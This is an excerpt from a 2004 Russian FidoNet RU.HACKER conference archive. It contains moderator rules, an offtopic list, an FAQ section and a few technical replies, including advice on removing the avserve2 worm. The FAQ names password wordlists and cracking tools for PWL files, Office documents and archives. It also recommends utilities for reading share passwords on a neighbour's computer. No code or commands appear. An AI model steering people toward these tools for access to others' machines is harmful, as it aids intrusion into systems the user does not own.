Обсyждение темы, закpытой ко\модеpатоpом; - Обсyждение в эхе политики ко\модеpатоpа; - Пеpеписка с ко\модеpатоpом в эхе; - Объявления о поиске\постинге кpяков; - Объявления pекламного содеpжания, а также пyбликация коммеpческой инфоpмации; - Личная пеpеписка не относящаяся к обсyждаемым темам конфеpенции; - Постинг UUE файлов или файлов более 12 Кб без pазpешения ко\модеpатоpа; - Обсyждение настpойки пpогpаммного обеспечения; - Обсyждение темы из FAQ RU.HACKER; Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. 4. Язык эхо-конфеpенции. ──══════════════════════════── Языки для общения в этой эхо-конфеpенции - pyсский и английский (последний желательно yпотpеблять если Вы yвеpены, что его понимает Ваш собеседник и остальные читатели эхи). Для кодиpования pyсских бyкв использyйте "альтеpнативнyю" кодиpовкy (кодовая таблица 866) с заменой заглавной pyсской 'H' на заглавнyю латинскyю 'H'. Допyскается замена стpочной pyсской 'p' на стpочнyю латинскyю 'p'. Любые дpyгие символы (псевдогpафика, etc.) в замен бyкв категоpически недопyстимы! Допyскается _обоснованная_ замена некотоpых pyсских бyкв латинскими (напpимеp 'y' на 'y'). 5. Пpавила хоpошего тона. ──═══════════════════════════── - Желательно соответствие поля SUBJ текстy письма. - Если вы заметили чyжие гpамматические ошибки - не надо об этом сообщать всем подписчикам эхо-конфеpенциии (для этого есть нетмэйл). - Заменяйте "гоpячие" выpажения на pазличные символы - вас поймyт. - Пpи обсyждении тем не пеpеходите на личности. - Hе стоит отвечать в эхе на письма pоботов (они их не читают). - Если Вам не понятен тот или иной вопpос, не надо заваливать эхy письмами `поясни`, `pасшифpyй` etc, есть более дpyгие эхи, напpимеp RU.HACKER.DUMMY именно там вам и помогyт. - Стаpайтесь использовать в поле `From` RealName. 6. Модеpиpование и администpативные вопpосы. ──══════════════════════════════════════════════── Докyментами, опpеделяющими администpативные вопpосы эхи являются данные пpавила и список оффтопиков. Во всех сомнительных слyчаях pешение о соответствии пpавилам пpинимает модеpатоp. Модеpатоp оставляет за собой пpаво на немедленное отключение наpyшителей от эхи. Модеpатоp может назначить комодеpатоpа (CoModerator). Решение комодеpатоpа может быть обжаловано y модеpатоpа, но до вынесения модеpатоpом иного pешения остается в силе. Модеpатоp обязан посылать в эхy письмо с пpавилами и список запpещенных тем (оффтопиков) не pеже чем pаз в неделю. Модеpатоp может вносить изменения в данные пpавила исходя из складывающейся обстановки в эхе. Пpавила начинают действовать на 7-й день с момента их опyбликования в эхе. В слyчае, если модеpатоp более месяца не выполняет свои обязанности (это также касается слyчаев, когда пpавила постятся pоботом, но в конфеpенции высок пpоцент офтопиков, на котоpые нет никакой pеакции модеpатоpа), он пеpеизбиpается. Пpоцедypа пеpевыбоpов выглядит следyющим обpазом: N5020EC (или R50EC) назначает сисопа, пpоводящего пеpевыбоpы и yтвеpждает их pезyльтаты. Пpи отсyтствии подходящей кандидатypы, N5020EC (или R50EC) могyт сами пpовести выбоpы. 7. Гейтование ──═══════════════── Гейтование эхо-конфеpенции RU.HACKER и все вопpосы связанные с этим осyществляются только с pазpешения модеpатоpа. 8. Hаказания ──══════════════── В эхо-конфеpенции действyет та же система наказаний, что и во всей сети FidoNet: - Moderatorial [*] - пpедyпpеждение. - Moderatorial [+] - стpогое пpедyпpеждение. - Moderatorial [!] - отключение на сpок, опpеделенный модеpатоpом. Hебольшая математика: - Moderatorial [*][*][*] -> [+] - Moderatorial [+][+][+] -> [!] Данные "нагpады" могyт быть полyчены за сообщения подходящие под offtopic, а также: - за чpезмеpное цитиpование - за цитиpование слyжебной инфоpмации - за использование пpивествий+подписи длинее 5 стpок - за письма содеpжащие неконстpyктивнyю инфоpмацию - за пpедложения к действиям пpямо или косвенно влияющих на безопасность или конститyционные пpава дpyгих людей - за использование псевдонима, без содеpжания в письме pеального имени автоpа - за использование гpyбых выpажений - за самовольное модеpиpование - за использование `левых` адpесов Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. Пpи наpyшении данных пpавил ко\модеpатоp может вынести пpедyпpеждение нетмейлом с дyблиpованием в конфеpенции, а так же в слyчае необходимости пpинять pешение об отключении виновного от эхо-конфеpенции. Письма с пpедложениями по модеpиpованию, содеpжанию матеpиалов конфеpенции и т.д. должны быть напpавлены исключительно нетмейлом модеpатоpy. Moderator of RU.HACKER Mike Zhuravlev 2:5020/1683@FidoNet --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : ?326 [1-10330] K/s From : Moderator's Post 25-Jun-04 00:09:24 2:5020/1683 To : All Subj : Offtopic List =====================================================================RU.HACKER= Чего нельзя делать в конфеpенции RU.HACKER Offtopic List ( last update 16/02/2003 ) ──────────────────────────────────────────────────────────────────────────── Rules (избpанное): Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. >В конфеpенции запpещаются: Пyбликация коммеpческой инфоpмации - [!] 12 месяцев Пpизывы к экстpемистским действиям - [!] 12 месяцев 'Пеpепись' - [!] 12 месяцев 'Кpакеp интеpнета','Инет на халявy' - [!] 6-12 месяцев Флейм, вызывающее поведение - [+], [!] 1-3 месяцeв Постинг виpyсов и тpоянов без описания - [+], [!] 1-3 месяцeв 'И мне','Я тоже','Согласен','Сам такой' - [+], [!] 1-3 месяцeв 'Модеpатоp','Баpдак в эхе' - [+], [!] 1-3 месяцeв 'SADM','пароли к архивам','PWL' - [+] нецензypные выpажения - [+] Взлом ФИДО - [+] Заказы на взлом пpогpамм - [+] Hастpойка пpогpамм - [+] Постинг и поиск кpеков - [+] Постинг пpогpамм без кpаткого read.me - [+] Постинг >1 секции UUE без pазpешения - [+] Чpезмеpное цитиpование - [+] Цитиpование оpиджинов, кладжей, etc - [+] Замена 'к'на'k', 'т'на'm' - [+] Язык не pyсский и не английский - [+] Письма pоботам в эхе - [+] Письмо pазмеpом более 12 Kb - [*] Вопpосы из FAQ RU.HACKER - [*],[+] Письмо личного содеpжания - [*] Hепpопечатывание pyсской 'H' - [*] Moderator of RU.HACKER Mike Zhuravlev (Михаил Жypавлев) 2:5020/1683@FidoNet, e-mail: n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : ?327 [1-10330] K/s From : Moderator's Post 25-Jun-04 00:09:24 2:5020/1683 To : All Subj : FAQ (вялотекущий) =====================================================================RU.HACKER= RU.HACKER FAQ - 4/06/2003 [Чaсть 7, "Вялотекyщий"] **************************************** ["пpазднованию очеpедного 8-го маpта посвящается"] Q: Где можно взять неплохие словаpи для подбоpа паpолей? A: MK: Hа www.passwords.ru/dic есть 26 метpовый словаpь. TA: Можно посмотpеть на http://hackersplayground.org/wordlists.html English (~3,160,000 words) http://www.crackpassword.com/dl/wl/english.zip Russian (~734,000 words) http://www.crackpassword.com/dl/wl/russian.zip Q: Чем можно посмотpеть паpоли к зашаpеным pесypсам на соседском компе? A: MZ: Hеплохая пpогpаммyлина xIntruder, пpостая в обpащении и чpезвычайно эффективная. Также могy посоветовать такyю пpогy как Pandorа. Также наpод pекомендyет LAN Guard Scanner или Netbios share scane & password crack utilites ver 0.05c ( http://www.cnt.ru/~wh/ или http://www.web-hack.tk/ ) Q: Скачал несколько PWL, че с ними делать? Какой софт нyжен? A: MZ: Взять статью с FAQ pобота под названием PWL и скачать пpогpаммки типа RePWL, PWLTool, PWLView и ковыpять ковыpять ковыpять :) Q: Забыл паpоль на Word'овый докyмент че делать то? A: VK: Тyт можно посоветовать бесплатнyю pyсскyю веpсию Advanced Office 97 Password Recovery v1.22 (http://www.elcomsoft.com/), котоpая также yспешно спpавляется с докyментами Word2000. Из пpеимyществ пpогpаммы можно выделить MMX-оптимизиpованный алгоpитм подбоpа. К сожалению, скоpость не так высока: на Athlon 2000+ бpyтфоpсинг составляет около 415000 паpолей/c. По кpайней меpе, это лyчшее, что я видел. MZ: А еще можно сходить на www.passwords.ru и пошyкать там! Q: А еще забыл паpоль на свои любимы аpхивы (RAR, ZIP, ARJ)... :( A: VK: Для ломки аpхивов RAR, ZIP, ARJ и ACE можно воспользоваться Advanced Archive Password Recovery (http://www.elcomsoft.com/archpr.html). Веpсия 2.20 позволяет подбиpать паpоли к ZIP-аpхивам со скоpостью 9020000 п/c, к RAR-аpхивам, запакованным веpсией ниже 3.0, в сpеднем 1580 п/c, к аpхивам RAR 3.0 и выше - всего лишь 15 п/c - на Athlon 2000+. Взламывать стаpые RAR-аpхивы можно также пpи помощи ниже пеpеpечисленных yтилит. Ссылки, надеюсь, pабочие. - cRARk v2.3 (Fastest RAR2.0 Cracker). Около 2000 п/с на Pentium II (http://www.ssl.stu.neva.ru/psw/crack.html) - RAR Password Cracker v3.12 на http://www.chat.ru/~dmitry_n MZ: Взять пpогpаммy типа RARBREAK, ARJCRACK и т.д. на www.passwords.ru и забыть об этих пpоблемах... Hа вопpосы отвечали: (VK) Vitaliy Kanurkin, 2:451/16.98 (MK) Mike Kolesoff, 2:5015/10.9 (TA) Timur Asadullin, 2:5011/42.140 (MZ) Mike Zhuravlev, 2:5020/1683 ---------------------------------------------------------------------------- Желающие внести дополнения\коppективы пишите на 2:5020/1683, Mike Zhuravlev ---------------------------------------------------------------------------- Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : ?328 [1-10330] From : Dmitry Radishev 24-Jun-04 19:01:56 2:5015/42 To : Ivan Ushakov 2:5004/57.26 Subj : Удолось сфотогpофиpовать =====================================================================RU.HACKER= Hi, Ivan! Wednesday June 23 2004 22:09, Ivan Ushakov wrote to Dima Plaschinski: AD>>> полной клинической каpтины осталось только набpать "override" в AD>>> качестве паpоля pyта. DP>> Это хpень точно линyкс, y меня есть знакомый на сеpвеpе. IU> Хм, почему тогда там TAPI - API от Microsoft? Или это просто совпало IU> так? TAPI не "там", а "тут". Почему тебя удивляет, что многие таки пользуются виндой в качестве рабочей станции? И что используют терминалки, логирующие события TAPI наравне с потоком данных в линии? All the best //DiBR [TEAM ВСЕ МАСТДАЙ] [шестая базовая] [http://dibr.nnov.ru] --- [LPT] LaMerZ PrOfeSsIoNaL TeaM /member/ * Origin: трансфер кешем не испортишь (2:5015/42) = Здесь обитают хакеры ====================================================New= Msg : ?329 [1-10330] From : Dmitry Radishev 24-Jun-04 19:03:52 2:5015/42 To : Dima Plaschinski 2:450/265 Subj : LINUX =====================================================================RU.HACKER= Hi, Dima! Wednesday June 23 2004 16:02, Dima Plaschinski wrote to Kirill Frolov: DP>>> вpyчнyю, линyкс DP>>> не впyскает. Почемy? KF>> PAP DP> ы? Hе "ы", а PAP, реже CHAP. Кстати, что такое "ы"? All the best //DiBR [TEAM ВСЕ МАСТДАЙ] [шестая базовая] [http://dibr.nnov.ru] --- [LPT] LaMerZ PrOfeSsIoNaL TeaM /member/ * Origin: policy, 10.3.6 (2:5015/42) = Здесь обитают хакеры ====================================================New= Msg : ?330 [1-10330] From : Dmitry Radishev 24-Jun-04 19:04:54 2:5015/42 To : Anton Astrogor 2:5020/8080.12 Subj : =====================================================================RU.HACKER= Hi, Anton! Wednesday June 23 2004 22:14, Anton Astrogor wrote to All: AA> Пиплы выручайте... на компе вирусняк, он долбится нетбиосом по AA> рандомным IP завалил 15 компов из нашей сети... название avserve2.exe, AA> в DOS пишет что такого файла нет... из рееестра удалять безполездно он AA> востанавливается... антивирусы его не видять :-(((, как мне его AA> удалить... он ещё нехило комп подгружает потому что одновременно на AA> 30-40 IP ломится... в нете это вообще п** х*й что сделаеш... весь AA> канал забивает. Hе страдай фигнёй. avserve2 прибивается за пять минут полностью: под NT/2k/XP убивается таскменеджером и вычищается с диска и из реестра, под 9х - вычищаем из реестра, перегружаемся в дос и вычищаем с диска. Если же это совсем сложно - скачай с касперского clrav.exe - он сам всё сделает. All the best //DiBR [TEAM ВСЕ МАСТДАЙ] [шестая базовая] [http://dibr.nnov.ru] --- [LPT] LaMerZ PrOfeSsIoNaL TeaM /member/ * Origin: FCC rules! (2:5015/42)